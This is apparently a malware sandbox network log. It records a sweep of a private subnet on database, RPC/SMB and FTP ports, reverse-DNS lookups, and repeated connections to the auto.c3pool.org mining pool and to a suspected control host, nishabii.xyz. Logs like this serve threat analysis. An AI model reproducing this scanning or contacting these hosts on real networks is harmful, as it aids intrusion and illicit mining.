N/A 10.127.0.19:1433 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.20:1433 tcp
N/A 10.127.0.21:1433 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.22:1433 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.23:1433 tcp
N/A 10.127.0.24:1433 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.25:1433 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.26:1433 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.27:1433 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.28:1433 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.30:1433 tcp
N/A 10.127.0.29:1433 tcp
N/A 10.127.0.31:1433 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.32:1433 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.33:1433 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.34:1433 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.35:1433 tcp
N/A 10.127.0.36:1433 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.37:1433 tcp
N/A 10.127.0.38:1433 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.39:1433 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.40:1433 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.42:1433 tcp
N/A 10.127.0.41:1433 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.44:1433 tcp
N/A 10.127.0.43:1433 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.45:1433 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.46:1433 tcp
N/A 10.127.0.47:1433 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.49:1433 tcp
N/A 10.127.0.48:1433 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.50:1433 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.51:1433 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.52:1433 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.53:1433 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.54:1433 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.55:1433 tcp
N/A 10.127.0.57:1433 tcp
N/A 10.127.0.56:1433 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.58:1433 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.59:1433 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.60:1433 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.61:1433 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.62:1433 tcp
N/A 10.127.0.63:1433 tcp
N/A 10.127.0.64:1433 tcp
N/A 10.127.0.65:1433 tcp
N/A 10.127.0.66:1433 tcp
N/A 10.127.0.67:1433 tcp
N/A 10.127.0.68:1433 tcp
N/A 10.127.0.69:1433 tcp
N/A 10.127.0.72:1433 tcp
N/A 10.127.0.70:1433 tcp
N/A 10.127.0.71:1433 tcp
N/A 10.127.0.73:1433 tcp
N/A 10.127.0.74:1433 tcp
N/A 10.127.0.76:1433 tcp
N/A 10.127.0.75:1433 tcp
N/A 10.127.0.77:1433 tcp
N/A 10.127.0.78:1433 tcp
N/A 10.127.0.79:1433 tcp
N/A 10.127.0.80:1433 tcp
N/A 10.127.0.81:1433 tcp
N/A 10.127.0.82:1433 tcp
N/A 10.127.0.83:1433 tcp
N/A 10.127.0.84:1433 tcp
N/A 10.127.0.85:1433 tcp
N/A 10.127.0.86:1433 tcp
N/A 10.127.0.87:1433 tcp
N/A 10.127.0.88:1433 tcp
N/A 10.127.0.90:1433 tcp
N/A 10.127.0.92:1433 tcp
N/A 10.127.0.91:1433 tcp
N/A 10.127.0.93:1433 tcp
N/A 10.127.0.94:1433 tcp
N/A 10.127.0.97:1433 tcp
N/A 10.127.0.96:1433 tcp
N/A 10.127.0.95:1433 tcp
N/A 10.127.0.98:1433 tcp
N/A 10.127.0.99:1433 tcp
N/A 10.127.0.100:1433 tcp
N/A 10.127.0.101:1433 tcp
N/A 10.127.0.102:1433 tcp
N/A 10.127.0.105:1433 tcp
N/A 10.127.0.103:1433 tcp
N/A 10.127.0.104:1433 tcp
N/A 10.127.0.106:1433 tcp
N/A 10.127.0.107:1433 tcp
N/A 10.127.0.108:1433 tcp
N/A 10.127.0.109:1433 tcp
N/A 10.127.0.112:1433 tcp
N/A 10.127.0.111:1433 tcp
N/A 10.127.0.110:1433 tcp
N/A 10.127.0.113:1433 tcp
N/A 10.127.0.114:1433 tcp
N/A 10.127.0.116:1433 tcp
N/A 10.127.0.115:1433 tcp
N/A 10.127.0.117:1433 tcp
N/A 10.127.0.118:1433 tcp
N/A 10.127.0.119:1433 tcp
N/A 10.127.0.89:19490 tcp
N/A 10.127.0.120:1433 tcp
N/A 10.127.0.121:1433 tcp
N/A 10.127.0.122:1433 tcp
N/A 10.127.0.123:1433 tcp
N/A 10.127.0.124:1433 tcp
N/A 10.127.0.125:1433 tcp
N/A 10.127.0.126:1433 tcp
N/A 10.127.0.127:1433 tcp
N/A 10.127.0.128:1433 tcp
N/A 10.127.0.130:1433 tcp
N/A 10.127.0.129:1433 tcp
N/A 10.127.0.131:1433 tcp
N/A 10.127.0.134:1433 tcp
N/A 10.127.0.133:1433 tcp
N/A 10.127.0.132:1433 tcp
N/A 10.127.0.135:1433 tcp
N/A 10.127.0.136:1433 tcp
N/A 10.127.0.137:1433 tcp
N/A 10.127.0.138:1433 tcp
N/A 10.127.0.139:1433 tcp
N/A 10.127.0.140:1433 tcp
N/A 10.127.0.142:1433 tcp
N/A 10.127.0.141:1433 tcp
N/A 10.127.0.143:1433 tcp
N/A 10.127.0.145:1433 tcp
N/A 10.127.0.146:1433 tcp
N/A 10.127.0.144:1433 tcp
N/A 10.127.0.147:1433 tcp
N/A 10.127.0.148:1433 tcp
N/A 10.127.0.149:1433 tcp
N/A 10.127.0.150:1433 tcp
N/A 10.127.0.151:1433 tcp
N/A 10.127.0.152:1433 tcp
N/A 10.127.0.153:1433 tcp
N/A 10.127.0.154:1433 tcp
N/A 10.127.0.155:1433 tcp
N/A 10.127.0.157:1433 tcp
N/A 10.127.0.158:1433 tcp
N/A 10.127.0.156:1433 tcp
N/A 10.127.0.159:1433 tcp
N/A 10.127.0.160:1433 tcp
N/A 10.127.0.161:1433 tcp
N/A 10.127.0.162:1433 tcp
N/A 10.127.0.163:1433 tcp
N/A 10.127.0.164:1433 tcp
N/A 10.127.0.166:1433 tcp
N/A 10.127.0.165:1433 tcp
N/A 10.127.0.167:1433 tcp
N/A 10.127.0.168:1433 tcp
N/A 10.127.0.169:1433 tcp
N/A 10.127.0.171:1433 tcp
N/A 10.127.0.170:1433 tcp
N/A 10.127.0.172:1433 tcp
N/A 10.127.0.173:1433 tcp
N/A 10.127.0.175:1433 tcp
N/A 10.127.0.174:1433 tcp
N/A 10.127.0.176:1433 tcp
N/A 10.127.0.177:1433 tcp
N/A 10.127.0.178:1433 tcp
N/A 10.127.0.179:1433 tcp
N/A 10.127.0.180:1433 tcp
N/A 10.127.0.181:1433 tcp
N/A 10.127.0.182:1433 tcp
N/A 10.127.0.183:1433 tcp
N/A 10.127.0.185:1433 tcp
N/A 10.127.0.184:1433 tcp
N/A 10.127.0.186:1433 tcp
N/A 10.127.0.187:1433 tcp
N/A 10.127.0.188:1433 tcp
N/A 10.127.0.190:1433 tcp
N/A 10.127.0.189:1433 tcp
N/A 10.127.0.191:1433 tcp
N/A 10.127.0.0:21 tcp
N/A 10.127.0.192:1433 tcp
N/A 10.127.0.1:21 tcp
N/A 10.127.0.193:1433 tcp
N/A 10.127.0.194:1433 tcp
N/A 10.127.0.2:21 tcp
N/A 10.127.0.195:1433 tcp
N/A 10.127.0.3:21 tcp
N/A 10.127.0.196:1433 tcp
N/A 10.127.0.197:1433 tcp
N/A 10.127.0.5:21 tcp
N/A 10.127.0.4:21 tcp
N/A 10.127.0.6:21 tcp
N/A 10.127.0.7:21 tcp
N/A 10.127.0.198:1433 tcp
N/A 10.127.0.199:1433 tcp
N/A 10.127.0.8:21 tcp
N/A 10.127.0.201:1433 tcp
N/A 10.127.0.200:1433 tcp
N/A 10.127.0.9:21 tcp
N/A 10.127.0.202:1433 tcp
N/A 10.127.0.10:21 tcp
N/A 10.127.0.203:1433 tcp
N/A 10.127.0.11:21 tcp
N/A 10.127.0.204:1433 tcp
N/A 10.127.0.13:21 tcp
N/A 10.127.0.12:21 tcp
N/A 10.127.0.205:1433 tcp
N/A 10.127.0.206:1433 tcp
N/A 10.127.0.14:21 tcp
N/A 10.127.0.15:21 tcp
N/A 10.127.0.16:21 tcp
N/A 10.127.0.207:1433 tcp
N/A 10.127.0.17:21 tcp
N/A 10.127.0.18:21 tcp
N/A 10.127.0.209:1433 tcp
N/A 10.127.0.208:1433 tcp
N/A 10.127.0.19:21 tcp
N/A 10.127.0.210:1433 tcp
N/A 10.127.0.211:1433 tcp
N/A 10.127.0.212:1433 tcp
N/A 10.127.0.21:21 tcp
N/A 10.127.0.20:21 tcp
N/A 10.127.0.22:21 tcp
N/A 10.127.0.23:21 tcp
N/A 10.127.0.24:21 tcp
N/A 10.127.0.25:21 tcp
N/A 10.127.0.26:21 tcp
N/A 10.127.0.27:21 tcp
N/A 10.127.0.220:1433 tcp
N/A 10.127.0.219:1433 tcp
N/A 10.127.0.218:1433 tcp
N/A 10.127.0.216:1433 tcp
N/A 10.127.0.217:1433 tcp
N/A 10.127.0.214:1433 tcp
N/A 10.127.0.215:1433 tcp
N/A 10.127.0.28:21 tcp
N/A 10.127.0.213:1433 tcp
N/A 10.127.0.29:21 tcp
N/A 10.127.0.30:21 tcp
N/A 10.127.0.221:1433 tcp
N/A 10.127.0.222:1433 tcp
N/A 10.127.0.31:21 tcp
N/A 10.127.0.223:1433 tcp
N/A 10.127.0.32:21 tcp
N/A 10.127.0.224:1433 tcp
N/A 10.127.0.33:21 tcp
N/A 10.127.0.225:1433 tcp
N/A 10.127.0.34:21 tcp
N/A 10.127.0.35:21 tcp
N/A 10.127.0.36:21 tcp
N/A 10.127.0.38:21 tcp
N/A 10.127.0.37:21 tcp
N/A 10.127.0.39:21 tcp
N/A 10.127.0.230:1433 tcp
N/A 10.127.0.229:1433 tcp
N/A 10.127.0.228:1433 tcp
N/A 10.127.0.226:1433 tcp
N/A 10.127.0.227:1433 tcp
N/A 10.127.0.231:1433 tcp
N/A 10.127.0.40:21 tcp
N/A 10.127.0.233:1433 tcp
N/A 10.127.0.232:1433 tcp
N/A 10.127.0.42:21 tcp
N/A 10.127.0.41:21 tcp
N/A 10.127.0.234:1433 tcp
N/A 10.127.0.235:1433 tcp
N/A 10.127.0.44:21 tcp
N/A 10.127.0.43:21 tcp
N/A 10.127.0.236:1433 tcp
N/A 10.127.0.53:21 tcp
N/A 10.127.0.52:21 tcp
N/A 10.127.0.51:21 tcp
N/A 10.127.0.49:21 tcp
N/A 10.127.0.50:21 tcp
N/A 10.127.0.48:21 tcp
N/A 10.127.0.46:21 tcp
N/A 10.127.0.47:21 tcp
N/A 10.127.0.45:21 tcp
N/A 10.127.0.54:21 tcp
N/A 10.127.0.57:21 tcp
N/A 10.127.0.56:21 tcp
N/A 10.127.0.55:21 tcp
N/A 10.127.0.249:1433 tcp
N/A 10.127.0.248:1433 tcp
N/A 10.127.0.246:1433 tcp
N/A 10.127.0.247:1433 tcp
N/A 10.127.0.244:1433 tcp
N/A 10.127.0.243:1433 tcp
N/A 10.127.0.245:1433 tcp
N/A 10.127.0.240:1433 tcp
N/A 10.127.0.241:1433 tcp
N/A 10.127.0.242:1433 tcp
N/A 10.127.0.239:1433 tcp
N/A 10.127.0.237:1433 tcp
N/A 10.127.0.238:1433 tcp
N/A 10.127.0.250:1433 tcp
N/A 10.127.0.58:21 tcp
N/A 10.127.0.59:21 tcp
N/A 10.127.0.60:21 tcp
N/A 10.127.0.61:21 tcp
N/A 10.127.0.62:21 tcp
N/A 10.127.0.63:21 tcp
N/A 10.127.0.64:21 tcp
N/A 10.127.0.254:1433 tcp
N/A 10.127.0.253:1433 tcp
N/A 10.127.0.252:1433 tcp
N/A 10.127.0.251:1433 tcp
N/A 10.127.0.65:21 tcp
N/A 10.127.0.66:21 tcp
N/A 10.127.0.67:21 tcp
N/A 10.127.0.68:21 tcp
N/A 10.127.0.69:21 tcp
N/A 10.127.0.71:21 tcp
N/A 10.127.0.70:21 tcp
N/A 10.127.0.72:21 tcp
N/A 10.127.0.73:21 tcp
N/A 10.127.0.74:21 tcp
N/A 10.127.0.75:21 tcp
N/A 10.127.0.76:21 tcp
N/A 10.127.0.77:21 tcp
N/A 10.127.0.78:21 tcp
N/A 10.127.0.79:21 tcp
N/A 10.127.0.80:21 tcp
N/A 10.127.0.81:21 tcp
US 8.8.8.8:53 auto.c3pool.org udp
DE 88.198.117.174:19999 auto.c3pool.org tcp
US 8.8.8.8:53 nishabii.xyz udp
CN 218.244.58.70:9011 nishabii.xyz tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
N/A 10.127.0.213:139 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.221:139 tcp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:139 tcp
N/A 10.127.0.247:139 tcp
N/A 10.127.0.242:139 tcp
N/A 10.127.0.241:139 tcp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.254:139 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.253:139 tcp
US 8.8.8.8:53 auto.c3pool.org udp
DE 195.201.97.156:19999 auto.c3pool.org tcp
US 8.8.8.8:53 156.97.201.195.in-addr.arpa udp
US 8.8.8.8:53 auto.c3pool.org udp
DE 159.69.83.232:19999 auto.c3pool.org tcp
US 8.8.8.8:53 232.83.69.159.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 nishabii.xyz udp
CN 218.244.58.70:9011 nishabii.xyz tcp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 auto.c3pool.org udp
DE 88.198.117.174:19999 auto.c3pool.org tcp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 auto.c3pool.org udp
DE 195.201.97.156:19999 auto.c3pool.org tcp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 auto.c3pool.org udp
DE 88.198.117.174:19999 auto.c3pool.org tcp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
